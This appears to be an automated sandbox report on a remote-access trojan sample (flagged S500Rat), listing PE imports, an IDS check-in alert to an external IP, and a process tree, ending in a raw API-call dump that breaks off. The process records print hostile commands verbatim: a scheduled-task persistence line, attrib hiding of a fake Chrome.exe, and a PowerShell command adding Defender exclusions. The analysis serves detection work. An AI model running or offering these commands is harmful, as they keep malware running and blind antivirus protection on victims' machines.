                                | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
                                | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
                                | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
                                | IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
                                | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
                                | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
                                | IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata |
                                | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
                                | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
                                | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                                | Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                                |---|---|---|---|---|---|---|---|---|
                                | .text | 0x1000 | 0x8061c | 0x80800 | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
                                | .rdata | 0x82000 | 0xdfc0 | 0xe000 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
                                | .data | 0x90000 | 0x1a758 | 0x6800 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
                                | .rsrc | 0xab000 | 0x34770 | 0x34800 | False | 0.2576078869047619 | data | 5.30911705403333 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

                                | Name | RVA | Size | Type | Language | Country |
                                |---|---|---|---|---|---|
                                | RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain |
                                | RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain |
                                | RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain |
                                | RT_ICON | 0xab940 | 0x400e | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain |
                                | RT_ICON | 0xaf950 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain |
                                | RT_ICON | 0xc0178 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain |
                                | RT_ICON | 0xc9620 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | Great Britain |
                                | RT_ICON | 0xcfe08 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain |
                                | RT_ICON | 0xd5290 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain |
                                | RT_ICON | 0xd94b8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain |
                                | RT_ICON | 0xdba60 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain |
                                | RT_ICON | 0xdcb08 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain |
                                | RT_MENU | 0xdcf70 | 0x50 | data | English | Great Britain |
                                | RT_DIALOG | 0xdcfc0 | 0xfc | data | English | Great Britain |
                                | RT_STRING | 0xdd0c0 | 0x530 | data | English | Great Britain |
                                | RT_STRING | 0xdd5f0 | 0x690 | data | English | Great Britain |
                                | RT_STRING | 0xddc80 | 0x4d0 | data | English | Great Britain |
                                | RT_STRING | 0xde150 | 0x5fc | data | English | Great Britain |
                                | RT_STRING | 0xde750 | 0x65c | data | English | Great Britain |
                                | RT_STRING | 0xdedb0 | 0x388 | data | English | Great Britain |
                                | RT_STRING | 0xdf138 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States |
                                | RT_GROUP_ICON | 0xdf290 | 0x84 | data | English | Great Britain |
                                | RT_GROUP_ICON | 0xdf318 | 0x14 | data | English | Great Britain |
                                | RT_GROUP_ICON | 0xdf330 | 0x14 | data | English | Great Britain |
                                | RT_GROUP_ICON | 0xdf348 | 0x14 | data | English | Great Britain |
                                | RT_VERSION | 0xdf360 | 0x19c | data | English | Great Britain |
                                | RT_MANIFEST | 0xdf500 | 0x26c | ASCII text, with CRLF line terminators | English | United States |

                                | DLL | Import |
                                |---|---|
                                | WSOCK32.dll | __WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv |
                                | VERSION.dll | VerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW |
                                | WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW |
                                | COMCTL32.dll | ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy |
                                | MPR.dll | WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW |
                                | WININET.dll | InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable |
                                | PSAPI.DLL | EnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules |
                                | USERENV.dll | CreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW |
                                | KERNEL32.dll | HeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA |
                                | USER32.dll | GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId |
                                | GDI32.dll | DeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo |
                                | COMDLG32.dll | GetSaveFileNameW, GetOpenFileNameW |
                                | ADVAPI32.dll | RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey |
                                | SHELL32.dll | DragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish |
                                | ole32.dll | OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString |
                                | OLEAUT32.dll | VariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit |

                                | Language of compilation system | Country where language is spoken |
                                |---|---|
                                | English | Great Britain |
                                | English | United States |

                                | Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
                                |---|---|---|---|---|---|---|---|
                                | 10/10/22-07:46:46.795098 | TCP | 2849885 | ETPRO MOBILE_MALWARE Trojan-Spy.AndroidOS.Agent.rz Checkin | 49740 | 5552 | 192.168.2.7 | 194.5.98.212 |


                                Target ID:0
                                Start time:07:43:25
                                Start date:10/10/2022
                                Path:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\#U91c7#U8d2d#U8ba2#U5355#U8981#U6c42 & #U7ed8#U56fe#U6837#U672c.exe
                                Imagebase:0x400000
                                File size:1382294 bytes
                                MD5 hash:D32389E2207879F0B57835EABCE6FB02
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low

                                Target ID:1
                                Start time:07:43:27
                                Start date:10/10/2022
                                Path:C:\Users\user\AppData\Local\Temp\NRHRAS.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Local\Temp\NRHRAS.exe"
                                Imagebase:0x2f0000
                                File size:51200 bytes
                                MD5 hash:9B1C1C565D60ED67CB6E1986ACD95C3A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: 00000001.00000002.321313528.0000000002CD9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: 00000001.00000000.238959755.00000000002F2000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: C:\Users\user\AppData\Local\Temp\NRHRAS.exe, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 85%, ReversingLabs
                                • Detection: 79%, Virustotal, Browse
                                • Detection: 43%, Metadefender, Browse
                                Reputation:low

                                Target ID:2
                                Start time:07:43:30
                                Start date:10/10/2022
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1
                                Imagebase:0xa60000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:3
                                Start time:07:43:31
                                Start date:10/10/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6edaf0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:4
                                Start time:07:43:31
                                Start date:10/10/2022
                                Path:C:\Windows\SysWOW64\schtasks.exe
                                Wow64 process (32bit):true
                                Commandline:schtasks /create /tn UALDJT.exe /tr C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe /sc minute /mo 1
                                Imagebase:0x1050000
                                File size:185856 bytes
                                MD5 hash:15FF7D8324231381BAD48A052F85DF04
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:5
                                Start time:07:43:31
                                Start date:10/10/2022
                                Path:C:\Windows\SysWOW64\wscript.exe
                                Wow64 process (32bit):true
                                Commandline:WSCript C:\Users\user~1\AppData\Local\Temp\UALDJT.vbs
                                Imagebase:0xa90000
                                File size:147456 bytes
                                MD5 hash:7075DD7B9BE8807FCA93ACD86F724884
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000005.00000002.634250998.00000000030A3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000005.00000002.640455808.00000000032A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000005.00000002.633552399.0000000003088000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:high

                                Target ID:6
                                Start time:07:43:33
                                Start date:10/10/2022
                                Path:C:\Windows\System32\attrib.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub
                                Imagebase:0x7ff7289c0000
                                File size:21504 bytes
                                MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:7
                                Start time:07:43:33
                                Start date:10/10/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6edaf0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:8
                                Start time:07:43:33
                                Start date:10/10/2022
                                Path:C:\Windows\System32\attrib.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\System32\attrib.exe" +s +h "C:\Users\user\AppData\Roaming\Stub\Chrome.exe
                                Imagebase:0x7ff7289c0000
                                File size:21504 bytes
                                MD5 hash:FDC601145CD289C6FBC96D3F805F3CD7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                Target ID:9
                                Start time:07:43:33
                                Start date:10/10/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6edaf0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:10
                                Start time:07:43:39
                                Start date:10/10/2022
                                Path:C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                                Imagebase:0x400000
                                File size:1382294 bytes
                                MD5 hash:D32389E2207879F0B57835EABCE6FB02
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 73%, ReversingLabs

                                Target ID:12
                                Start time:07:43:49
                                Start date:10/10/2022
                                Path:C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                                Imagebase:0x400000
                                File size:1382294 bytes
                                MD5 hash:D32389E2207879F0B57835EABCE6FB02
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language

                                Target ID:15
                                Start time:07:43:54
                                Start date:10/10/2022
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmp1D8D.tmp.bat""
                                Imagebase:0x7ff7651b0000
                                File size:273920 bytes
                                MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:16
                                Start time:07:43:55
                                Start date:10/10/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6edaf0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:17
                                Start time:07:43:55
                                Start date:10/10/2022
                                Path:C:\Windows\System32\timeout.exe
                                Wow64 process (32bit):false
                                Commandline:timeout 3
                                Imagebase:0x7ff6c2ff0000
                                File size:30720 bytes
                                MD5 hash:EB9A65078396FB5D4E3813BB9198CB18
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                Target ID:20
                                Start time:07:43:58
                                Start date:10/10/2022
                                Path:C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\AppData\Roaming\Windata\Acrobat Reader DC.exe"
                                Imagebase:0x400000
                                File size:1382294 bytes
                                MD5 hash:D32389E2207879F0B57835EABCE6FB02
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language

                                Target ID:21
                                Start time:07:44:01
                                Start date:10/10/2022
                                Path:C:\Users\user\AppData\Roaming\Stub\Chrome.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Users\user\AppData\Roaming\Stub\Chrome.exe"
                                Imagebase:0x200000
                                File size:51200 bytes
                                MD5 hash:9B1C1C565D60ED67CB6E1986ACD95C3A
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_S500Rat, Description: Yara detected S500Rat, Source: C:\Users\user\AppData\Roaming\Stub\Chrome.exe, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Avira
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 85%, ReversingLabs
                                • Detection: 79%, Virustotal, Browse
                                • Detection: 43%, Metadefender, Browse

                                Target ID:24
                                Start time:07:44:06
                                Start date:10/10/2022
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -ExclusionExtension exe,bat,dll,ps1;exit
                                Imagebase:0x7ff6f4710000
                                File size:447488 bytes
                                MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET

                                Target ID:25
                                Start time:07:44:07
                                Start date:10/10/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff6edaf0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                  Execution Graph

                                  Execution Coverage:42.5%
                                  Dynamic/Decrypted Code Coverage:100%
                                  Signature Coverage:50%
                                  Total number of Nodes:6
                                  Total number of Limit Nodes:0

                                  Callgraph

                                  • Executed
                                  • Not Executed
                                  • Opacity -> Relevance
                                  • Disassembly available

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 8 7ffdc3d41d99-7ffdc3d41e5d NtSetValueKey 12 7ffdc3d41e5f 8->12 13 7ffdc3d41e65-7ffdc3d41e82 8->13 12->13
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.330088239.00007FFDC3D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3D40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffdc3d40000_NRHRAS.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 3385f979313c35148d2acabdf793104df53527724127aa5b819118fb3ae59620
                                  • Instruction ID: 3681bdc54a7cc83dce86d9a85e782a7327db96080c834dbea5b8cc38909987ba
                                  • Opcode Fuzzy Hash: 3385f979313c35148d2acabdf793104df53527724127aa5b819118fb3ae59620
                                  • Instruction Fuzzy Hash: F031C531A0CB4C8FDB58DF58D845AE9BBF0FB69321F14416FD049D3652DB70A8468B81
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Control-flow Graph

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.330088239.00007FFDC3D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC3D40000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_7ffdc3d40000_NRHRAS.jbxd
                                  Similarity
                                  • API ID: Open
                                  • String ID:
                                  • API String ID: 71445658-0
                                  • Opcode ID: 6f8bb5675397ce6f5bfdd5279cc1804f264d75546313a7ae75cbf16897e22ab1
                                  • Instruction ID: ffa2a9a2ed217475fa5b960d91cb83c0ce4e62ff63fc067aa8359509d4f71af8
                                  • Opcode Fuzzy Hash: 6f8bb5675397ce6f5bfdd5279cc1804f264d75546313a7ae75cbf16897e22ab1
                                  • Instruction Fuzzy Hash: D731957191CB584FDB18DF5CD8456E97BF0FBA9321F04826FE089D3252DA706845CB82
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Execution Graph

                                  Execution Coverage:8.4%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:4.1%
                                  Total number of Nodes:1789
                                  Total number of Limit Nodes:29
API calls 2 library calls 28639 4318eb HttpQueryInfoW 28640 432ee9 60 API calls __forcdecpt_l 28642 4404e8 8 API calls 28643 4414f4 GetWindowLongW PostMessageW 28644 4424f3 128 API calls 28646 435481 VariantCopy VariantChangeType 28647 443a87 56 API calls moneypunct 28648 443c87 52 API calls 28649 440880 56 API calls 28650 448480 GetMenuItemInfoW IsMenu InsertMenuItemW DrawMenuBar _memset 28651 442a83 7 API calls 28654 447e8e 53 API calls 28655 43288e InterlockedIncrement 26843 40dc90 26844 40bc70 52 API calls 26843->26844 26845 40dd03 26844->26845 26850 40f210 26845->26850 26848 40dd96 26849 40ddb7 26848->26849 26853 40dc00 52 API calls 2 library calls 26848->26853 26854 40f250 RegOpenKeyExW 26850->26854 26852 40f230 26852->26848 26853->26848 26855 425e17 26854->26855 26856 40f275 RegQueryValueExW 26854->26856 26855->26852 26857 40f2c3 RegCloseKey 26856->26857 26858 40f298 26856->26858 26857->26852 26859 40f2a9 RegCloseKey 26858->26859 26860 425e1d 26858->26860 26859->26852 28657 433493 60 API calls 3 library calls 28658 44429f 64 API calls 28659 43009d 14 API calls 28660 44389a 53 API calls 2 library calls 28661 41aaa1 53 API calls __calloc_crt 28662 4368a0 SendMessageW SendMessageW SendMessageW SendMessageW 28663 4478ac 6 API calls 28664 434aa8 FreeLibrary moneypunct 28665 4426a9 WaitForSingleObject 26861 40d6b0 26862 42e2f3 26861->26862 26863 40d6cc 26861->26863 26864 408f40 VariantClear 26863->26864 26865 40d707 26864->26865 26884 